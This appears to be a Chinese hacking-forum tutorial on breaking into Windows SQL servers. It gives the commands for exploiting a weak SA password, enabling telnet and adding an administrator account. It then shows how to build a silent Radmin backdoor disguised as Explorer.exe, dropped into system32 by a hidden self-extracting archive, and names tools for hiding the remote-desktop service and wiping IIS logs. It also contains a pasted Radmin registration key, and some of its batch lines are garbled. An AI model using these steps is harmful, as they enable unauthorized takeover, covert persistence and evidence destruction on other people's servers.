工具:WINNTAutoAttack自动攻击器（扫漏洞）；SQLTOOLS（SA空口令连接器）；RAMDIN影子3.0中文版（远程控制程序）（RADMIN注册码: 

08US9A95I lKa9nbOLXqv0V8xqdDvKGcNcTpN2wV11iSqOCVuA 
6A5KKZRHc5GVMIybWomK6rNwoj8mYy8LXRFi23）；SC.exe port.bat query.exe quser.exe（隐藏3389服务及不让管理发现自己程序）；CleanIISLog.exe（小榕的擦PP程序）；3389.exe（开3389端口服务的）；psu.exe（使用被禁止的Guest帐户要用到的）；mstsc.exe（远程桌面连接程序）。 

一.扫到SA弱口令(自动攻击器) 

二.用SQLTOOLS连上去建一个用户 

net start telnet 
开telnet服务 
net user mint mint /add 
添加用户mint密码为 
mint net localgroup administrators mint /add 
将帐号mint升级为管理员 

三.上传后门程序RAD.EXE(RADMIN服务端自解压程序) 

*** RAD.EXE过程: 

1、到Radmin安装目录下找到AdmDll.dll、 raddrv.dll和r_sever.exe； 

2、在本地设置服务端（一定要生成）； 

设置密码-->>设置连接端口(默认4489)-->>生成 

3、导出注册表HKEY_LOCAL_MACHINE\\SYSTEM\\Radmin的键值为1.reg； 

4、编写一个批处理，并命名为u.bat； 

@echo offnet stop r_server 

5、写第二个批处理，r.bat,内容为： 

@echo off@Explorer.exe / 
uninstall /silence@Explorer.exe /install / 
silence@regedit /s 1.reg@echo off@Explorer.exe /uninstall / 
silence@Explorer.exe /install /silence@regedit / 
s 1.reg@net start r_server@del 
rad.exe@del 1.reg@del r.bat@del u.bat 

6、将AdmDLL.dll raddrv.dll Explorer.exe(r_sever.exe改名) u.bat r.bat压缩成Rad.RAR压缩包； 
7、将Rad.rar *** 成自解压文件； 

选择Default.sfx的自释放模块-->>高级自释放选项 

-->>常规 

释放路径:%systemroot%\\system32 

安装程序:释放后运行:r.bat 释放前运行u.bat 

-->>摸式 

缄默模式:全部隐藏 覆盖方式:覆盖所有文件